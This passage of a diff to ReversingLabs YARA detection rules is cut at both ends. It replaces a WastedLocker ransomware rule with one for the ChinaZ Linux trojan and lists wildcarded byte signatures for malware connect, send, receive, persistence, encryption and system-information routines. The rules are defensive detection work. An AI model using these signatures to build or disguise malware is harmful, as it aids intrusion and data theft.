?? ?? ?? 0A 2B ?? 06 + } + $send_v1 = { + 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 16 0A 38 ?? ?? ?? ?? 00 00 7E ?? + ?? ?? ?? 0B 00 07 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 + ?? 11 ?? 2C ?? 16 0A DD ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 02 8E B7 0D 12 ?? 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 0C 11 ?? 08 16 08 + 8E B7 6F ?? ?? ?? ?? 00 11 ?? 02 16 02 8E B7 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? + ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 11 ?? 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 00 DE + ?? 11 ?? 28 ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 28 ?? ?? ?? ?? + 00 11 ?? 13 ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? + 6F ?? ?? ?? ?? 00 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 28 ?? + ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 0A 2B ?? 06 + } + $receive_v1_p1 = { + 00 00 00 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? + 13 ?? 11 ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 00 00 00 07 17 D6 0B 07 1F ?? (FE | 01) ?? + 13 ?? 11 ?? 2C ?? 16 0B 17 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? + 11 ?? 2C ?? 00 DD ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 (FE | 04) ?? 13 ?? + 11 ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? ?? 26 00 00 00 7E ?? ?? + ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 06 15 6A (FE | 01) ?? + 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? + ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 15 59 13 ?? 11 ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? + ?? ?? ?? ?? 2B ?? 00 00 DD ?? ?? ?? ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? + ?? 13 ?? 06 16 6A (FE | 01) ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 + 6A 0A 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C + ?? 38 ?? ?? ?? ?? 00 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 00 17 13 ?? 11 ?? 3A ?? + ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? + ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0D 7E ?? ?? ?? ?? 8E B7 6A 09 (FE | 02) + } + $receive_v1_p2 = { + 13 ?? 11 ?? 2C ?? 09 17 6A DA B7 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 00 + 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E B7 16 6F ?? ?? ?? + ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 08 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? + ?? ?? 06 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 15 6A 0A 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? + ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 + 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 80 ?? + ?? ?? ?? 00 38 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? + 00 00 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 7E ?? + ?? ?? ?? 28 ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 17 28 ?? ?? ?? + ?? 26 14 80 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 + 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 2B ?? 00 17 80 ?? + ?? ?? ?? 38 ?? ?? ?? ?? 00 + } + $connect_v2 = { + 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? + ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 14 80 ?? ?? ?? ?? DE ?? + 26 DE ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 73 ?? ?? ?? ?? + 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? + ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 + 10 27 00 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? + ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 80 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 07 7F ?? ?? ?? ?? 28 + ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 2B ?? 07 0C 72 ?? ?? ?? ?? 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 08 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 0B 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 07 A2 11 ?? 17 7E ?? ?? ?? ?? A2 11 ?? 18 + 72 ?? ?? ?? ?? A2 11 ?? 19 7E ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? + ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E + ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B + 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? DE ?? 26 16 80 ?? ?? ?? ?? DE ?? + DE ?? 11 ?? 28 ?? ?? ?? ?? DC 7E + } + $receive_v2 = { + 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 07 17 D6 + 0B 07 1F ?? 33 ?? 16 0B 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 6F ?? ?? ?? ?? 17 3C ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? + ?? 26 38 ?? ?? ?? ?? 06 15 6A 3B ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 8D + ?? ?? ?? ?? 80 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0C 7E ?? ?? ?? ?? 8E + 69 6A 08 31 ?? 08 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F + ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 16 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? + ?? 7E ?? ?? ?? ?? 16 09 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 40 ?? ?? ?? + ?? 15 6A 0A 7E ?? ?? ?? ?? 2D ?? 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? + ?? ?? 7E ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? + ?? 80 ?? ?? ?? ?? 38 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? 13 ?? 11 ?? 15 2E ?? 11 ?? 2C ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 28 + ?? ?? ?? ?? 0A 06 16 6A 33 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 6A 0A 7E ?? ?? ?? + ?? 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? DE + ?? 26 DE ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? + 14 14 14 17 28 ?? ?? ?? ?? 26 14 80 ?? ?? ?? ?? DE ?? 26 DE ?? 16 80 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 2C ?? 17 80 + } + $get_system_information_v2_p1 = { + 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 0B 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 07 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 0D 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 + ?? 09 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 13 ?? 28 ?? + ?? ?? ?? 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 + 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? + ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE + ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 7E ?? ?? ?? ?? 6F + ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E + ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? + ?? 0A DE ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 0A DE ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? + ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 33 ?? 06 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 0A 06 11 ?? 11 ?? 8E 69 17 DA 9A 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 + } + $get_system_information_v2_p2 = { + 28 ?? ?? ?? ?? 0A DE ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06 + 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 28 ?? ?? ?? + ?? 2C ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? + 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A + 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? + 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? + 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A + 13 ?? 11 ?? 6F ?? ?? ?? ?? 1F ?? 33 ?? 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 + ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 06 11 ?? 28 + } + $send_v2 = { + 7E ?? ?? ?? ?? 2D ?? 16 2A 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 2D ?? 16 13 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 02 8E 69 13 ?? 12 ?? 28 ?? ?? ?? + ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 12 ?? 28 ?? ?? ?? ?? 0D 07 09 16 09 8E 69 6F ?? + ?? ?? ?? 07 02 16 02 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ?? + ?? ?? 16 07 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 11 ?? 28 + ?? ?? ?? ?? DC DE ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 16 80 ?? ?? ?? + ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 28 ?? ?? ?? ?? DE ?? 7E ?? ?? ?? ?? + 2A 11 + } condition: - uint16(0)==0x5A4D and ( all of ($find_volumes_p*)) and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and ((( all of ($persistence_mechanism_v1_p*)) and ( all of ($connect_v1_p*)) and ($send_v1) and ( all of ($receive_v1_p*))) or (($connect_v2) and ($receive_v2) and ( all of ($get_system_information_v2_p*)) and ($send_v2))) } -rule REVERSINGLABS_Win32_Ransomware_Wastedlocker : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Linux_Trojan_Chinaz : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects WastedLocker ransomware." + description = "Yara rule that detects ChinaZ trojan." author = "ReversingLabs" - id = "68090960-9878-5836-8caa-bf8f408a474e" - date = "2020-12-07" - modified = "2020-12-07" + id = "f99c224b-db54-5cae-b5fb-8939ebee3250" + date = "2024-07-31" + modified = "2024-07-31" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Wastedlocker.yara#L1-L86" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0899d3cc3bcea8eae60689a54f34e57bdc52088c879c8420b8e6d0b1969cb186" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Linux.Trojan.ChinaZ.yara#L1-L246" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d8d08f4f3f36ecc7b219b6b1aae3c76d26e8fb3a44444763929190c6124532ff" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WastedLocker" + tc_detection_type = "Trojan" + tc_detection_name = "ChinaZ" tc_detection_factor = 5 importance = 25 strings: - $find_files_p1 = { - 55 8B EC 83 EC ?? 83 65 ?? ?? 57 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 53 8B 5D ?? 8D 04 41 89 45 ?? - C7 00 ?? ?? ?? ?? 8B 43 ?? 57 51 89 45 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 0F 84 - ?? ?? ?? ?? 56 8D 47 ?? 66 83 38 ?? 75 ?? 0F B7 4F ?? 66 85 C9 0F 84 ?? ?? ?? ?? 66 - 83 F9 ?? 75 ?? 66 83 7F ?? ?? 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F0 - 8D 14 0E B8 ?? ?? ?? ?? 3B D0 89 55 ?? 0F 83 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? - 8B 45 ?? 85 C0 74 ?? 83 7F ?? ?? 75 ?? 39 47 ?? 0F 82 ?? ?? ?? ?? 8D 44 36 ?? 50 8D - 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 - E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 E8 - ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 03 C6 8D 44 00 ?? 83 C0 ?? 50 6A ?? FF - 35 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 6A - ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 8D 44 00 ?? 50 FF 75 ?? 8D 46 ?? 50 89 76 ?? 89 36 E8 - ?? ?? ?? ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 07 89 46 ?? 8B 47 ?? 89 46 ?? 8B + $collect_system_information_32_p1 = { + 55 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? + ?? 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 31 C9 89 C6 8D 44 24 ?? 31 + FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? + ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? + 29 F1 19 FB 31 ED 2B 44 24 ?? 89 4C 24 ?? 8D B4 24 ?? ?? ?? ?? 89 5C 24 ?? 89 F7 69 + C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24 + ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B + 5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? + 8D 9C 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 } - $find_files_p2 = { - 47 ?? 89 46 ?? 8B 47 ?? 89 46 ?? 8B 47 ?? 83 C4 ?? 89 46 ?? 83 3B ?? 74 ?? 53 FF 15 - ?? ?? ?? ?? 8D 43 ?? 8B 48 ?? 89 06 89 4E ?? 89 31 89 70 ?? FF 43 ?? 83 7B ?? ?? 74 - ?? 8B 43 ?? 83 F8 ?? 75 ?? FF 73 ?? FF 15 ?? ?? ?? ?? 83 3B ?? 0F 84 ?? ?? ?? ?? 53 - FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? F6 45 ?? ?? 74 ?? 8D 4C 0E ?? 3B - C8 73 ?? 8D 04 36 50 8D 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 8D 04 41 - 66 83 60 ?? ?? 83 C4 ?? 83 7D ?? ?? 66 C7 00 ?? ?? 74 ?? 83 C1 ?? 51 8B 4D ?? E8 ?? - ?? ?? ?? 85 C0 75 ?? 8B 4D ?? FF 75 ?? 8B 45 ?? 53 FF 75 ?? 8D 44 06 ?? FF 75 ?? 50 - 51 E8 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? F6 45 ?? ?? - 74 ?? 83 65 ?? ?? 83 7D ?? ?? 75 ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 43 - ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5B EB - ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 5F C9 C2 + $collect_system_information_32_p2 = { + C7 04 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 + DF B1 ?? F3 AB 89 DF 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 54 24 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 F7 C7 44 24 ?? ?? ?? ?? ?? 89 D0 + C1 F8 ?? C1 E8 ?? 01 D0 C1 F8 ?? 89 44 24 ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C2 A1 ?? ?? ?? + ?? 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 DF B1 ?? F3 + AB 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 0F + 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? + ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D + C3 } - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 8B 3D ?? ?? ?? ?? FF 75 ?? FF D7 85 C0 - 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 75 ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? F6 C3 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? - ?? ?? ?? 85 C0 75 ?? 33 DB 85 DB 89 5D ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? - ?? ?? ?? 89 45 ?? EB ?? 83 65 ?? ?? 33 C9 39 4D ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 39 4D ?? 74 ?? 8B 45 ?? 8B 10 8B 40 ?? C1 65 ?? ?? 89 55 ?? 89 45 - ?? EB ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 4D ?? 8B 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? - 8B 5D ?? 33 F6 8B 45 ?? 85 C0 89 45 ?? 74 ?? 3B D8 73 ?? 89 5D ?? 2B 45 ?? 89 45 ?? - 75 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 7D ?? 8D 45 ?? 50 57 8D 47 ?? 50 FF 75 - ?? 8B 45 ?? 03 C6 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 03 75 ?? 85 C0 89 45 ?? 0F + $send_system_info_32 = { + 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? + 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? + ?? 